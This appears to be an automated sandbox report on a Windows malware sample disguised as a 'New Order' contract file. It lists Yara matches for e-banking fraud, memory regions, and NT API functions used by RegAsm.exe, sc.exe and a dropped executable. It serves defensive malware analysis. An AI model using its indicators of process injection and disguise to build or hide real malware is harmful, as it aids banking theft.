Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

barindex
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: initial sample Static PE information: Filename: New Order - RCII900718_Contract Drafting.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0042CDA3 NtClose, 1_2_0042CDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892B60 NtClose,LdrInitializeThunk, 1_2_02892B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892C70 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_02892C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_02892DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028935C0 NtCreateMutant,LdrInitializeThunk, 1_2_028935C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02894340 NtSetContextThread, 1_2_02894340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02894650 NtSuspendThread, 1_2_02894650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892AB0 NtWaitForSingleObject, 1_2_02892AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892AD0 NtReadFile, 1_2_02892AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892AF0 NtWriteFile, 1_2_02892AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892B80 NtQueryInformationFile, 1_2_02892B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892BA0 NtEnumerateValueKey, 1_2_02892BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892BE0 NtQueryValueKey, 1_2_02892BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892BF0 NtAllocateVirtualMemory, 1_2_02892BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892E80 NtReadVirtualMemory, 1_2_02892E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892EA0 NtAdjustPrivilegesToken, 1_2_02892EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892EE0 NtQueueApcThread, 1_2_02892EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892E30 NtWriteVirtualMemory, 1_2_02892E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892F90 NtProtectVirtualMemory, 1_2_02892F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892FA0 NtQuerySection, 1_2_02892FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892FB0 NtResumeThread, 1_2_02892FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892FE0 NtCreateFile, 1_2_02892FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892F30 NtCreateSection, 1_2_02892F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892F60 NtCreateProcessEx, 1_2_02892F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892CA0 NtQueryInformationToken, 1_2_02892CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892CC0 NtQueryVirtualMemory, 1_2_02892CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892CF0 NtOpenProcess, 1_2_02892CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892C00 NtQueryInformationProcess, 1_2_02892C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892C60 NtCreateKey, 1_2_02892C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892DB0 NtEnumerateKey, 1_2_02892DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892DD0 NtDelayExecution, 1_2_02892DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892D00 NtSetInformationFile, 1_2_02892D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892D10 NtMapViewOfSection, 1_2_02892D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02892D30 NtUnmapViewOfSection, 1_2_02892D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02893090 NtSetValueKey, 1_2_02893090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02893010 NtOpenDirectoryObject, 1_2_02893010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028939B0 NtGetContextThread, 1_2_028939B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02893D10 NtOpenProcessToken, 1_2_02893D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02893D70 NtOpenThread, 1_2_02893D70
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A04340 NtSetContextThread,LdrInitializeThunk, 6_2_03A04340
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A04650 NtSuspendThread,LdrInitializeThunk, 6_2_03A04650
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02BA0 NtEnumerateValueKey,LdrInitializeThunk, 6_2_03A02BA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02BE0 NtQueryValueKey,LdrInitializeThunk, 6_2_03A02BE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_03A02BF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02B60 NtClose,LdrInitializeThunk, 6_2_03A02B60
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02AF0 NtWriteFile,LdrInitializeThunk, 6_2_03A02AF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02AD0 NtReadFile,LdrInitializeThunk, 6_2_03A02AD0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02FB0 NtResumeThread,LdrInitializeThunk, 6_2_03A02FB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02FE0 NtCreateFile,LdrInitializeThunk, 6_2_03A02FE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02F30 NtCreateSection,LdrInitializeThunk, 6_2_03A02F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_03A02E80
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02EE0 NtQueueApcThread,LdrInitializeThunk, 6_2_03A02EE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_03A02DF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02DD0 NtDelayExecution,LdrInitializeThunk, 6_2_03A02DD0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_03A02D30
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_03A02D10
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_03A02CA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02C60 NtCreateKey,LdrInitializeThunk, 6_2_03A02C60
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_03A02C70
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A035C0 NtCreateMutant,LdrInitializeThunk, 6_2_03A035C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A039B0 NtGetContextThread,LdrInitializeThunk, 6_2_03A039B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02B80 NtQueryInformationFile, 6_2_03A02B80
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02AB0 NtWaitForSingleObject, 6_2_03A02AB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02FA0 NtQuerySection, 6_2_03A02FA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02F90 NtProtectVirtualMemory, 6_2_03A02F90
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02F60 NtCreateProcessEx, 6_2_03A02F60
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02EA0 NtAdjustPrivilegesToken, 6_2_03A02EA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02E30 NtWriteVirtualMemory, 6_2_03A02E30
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02DB0 NtEnumerateKey, 6_2_03A02DB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02D00 NtSetInformationFile, 6_2_03A02D00
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02CF0 NtOpenProcess, 6_2_03A02CF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02CC0 NtQueryVirtualMemory, 6_2_03A02CC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A02C00 NtQueryInformationProcess, 6_2_03A02C00
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A03090 NtSetValueKey, 6_2_03A03090
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A03010 NtOpenDirectoryObject, 6_2_03A03010
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A03D10 NtOpenProcessToken, 6_2_03A03D10
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A03D70 NtOpenThread, 6_2_03A03D70
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F39640 NtCreateFile, 6_2_02F39640
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F397B0 NtReadFile, 6_2_02F397B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F39AC0 NtAllocateVirtualMemory, 6_2_02F39AC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F398B0 NtDeleteFile, 6_2_02F398B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F39960 NtClose, 6_2_02F39960
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Code function: 0_2_00F13EBC 0_2_00F13EBC
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Code function: 0_2_00F12B78 0_2_00F12B78
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Code function: 0_2_00F12B68 0_2_00F12B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00418C13 1_2_00418C13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00403190 1_2_00403190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0042F3C3 1_2_0042F3C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00410403 1_2_00410403
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00416E13 1_2_00416E13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040E613 1_2_0040E613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00410623 1_2_00410623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040E757 1_2_0040E757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040E75F 1_2_0040E75F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040E763 1_2_0040E763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004027D0 1_2_004027D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E02C0 1_2_028E02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029203E6 1_2_029203E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E3F0 1_2_0286E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291A352 1_2_0291A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F2000 1_2_028F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029141A2 1_2_029141A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029201AA 1_2_029201AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029181CC 1_2_029181CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850100 1_2_02850100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FA118 1_2_028FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E8158 1_2_028E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287C6E0 1_2_0287C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285C7C0 1_2_0285C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02884750 1_2_02884750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860770 1_2_02860770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290E4F6 1_2_0290E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02904420 1_2_02904420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02912446 1_2_02912446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02920591 1_2_02920591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860535 1_2_02860535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285EA80 1_2_0285EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02916BD7 1_2_02916BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291AB40 1_2_0291AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028468B8 1_2_028468B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E8F0 1_2_0288E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02862840 1_2_02862840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286A840 1_2_0286A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028629A0 1_2_028629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0292A9A6 1_2_0292A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02876962 1_2_02876962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291CE93 1_2_0291CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02872E90 1_2_02872E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291EEDB 1_2_0291EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291EE26 1_2_0291EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860E59 1_2_02860E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DEFA0 1_2_028DEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02852FC8 1_2_02852FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02902F30 1_2_02902F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A2F28 1_2_028A2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02880F30 1_2_02880F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D4F40 1_2_028D4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900CB5 1_2_02900CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02850CF2 1_2_02850CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02860C00 1_2_02860C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02878DBF 1_2_02878DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285ADE0 1_2_0285ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286AD00 1_2_0286AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FCD1F 1_2_028FCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028652A0 1_2_028652A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287B2C0 1_2_0287B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287D2F0 1_2_0287D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029012ED 1_2_029012ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A739A 1_2_028A739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291132D 1_2_0291132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284D34C 1_2_0284D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028670C0 1_2_028670C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290F0CC 1_2_0290F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291F0E0 1_2_0291F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029170E9 1_2_029170E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286B1B0 1_2_0286B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0289516C 1_2_0289516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284F172 1_2_0284F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0292B16B 1_2_0292B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029116CC 1_2_029116CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A5630 1_2_028A5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291F7B0 1_2_0291F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291F43F 1_2_0291F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02851460 1_2_02851460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FD5B0 1_2_028FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029295C3 1_2_029295C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02917571 1_2_02917571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FDAAC 1_2_028FDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028A5AA0 1_2_028A5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02901AA3 1_2_02901AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290DAC6 1_2_0290DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02917A46 1_2_02917A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291FA49 1_2_0291FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D3A6C 1_2_028D3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287FB80 1_2_0287FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0289DBF9 1_2_0289DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D5BF0 1_2_028D5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291FB76 1_2_0291FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028638E0 1_2_028638E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CD800 1_2_028CD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F5910 1_2_028F5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02869950 1_2_02869950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287B950 1_2_0287B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02869EB0 1_2_02869EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02861F92 1_2_02861F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291FFB1 1_2_0291FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02823FD2 1_2_02823FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02823FD5 1_2_02823FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291FF09 1_2_0291FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291FCF2 1_2_0291FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D9C32 1_2_028D9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287FDC0 1_2_0287FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02863D40 1_2_02863D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02911D5A 1_2_02911D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02917D73 1_2_02917D73
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C40F8 5_2_028C40F8
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C4104 5_2_028C4104
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C4100 5_2_028C4100
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028CC7B4 5_2_028CC7B4
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C3FB4 5_2_028C3FB4
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C5FC4 5_2_028C5FC4
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C5DA4 5_2_028C5DA4
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028E4D64 5_2_028E4D64
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A903E6 6_2_03A903E6
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039DE3F0 6_2_039DE3F0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8A352 6_2_03A8A352
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A502C0 6_2_03A502C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A70274 6_2_03A70274
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A901AA 6_2_03A901AA
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A841A2 6_2_03A841A2
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A881CC 6_2_03A881CC
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039C0100 6_2_039C0100
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A6A118 6_2_03A6A118
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A58158 6_2_03A58158
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A62000 6_2_03A62000
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039CC7C0 6_2_039CC7C0
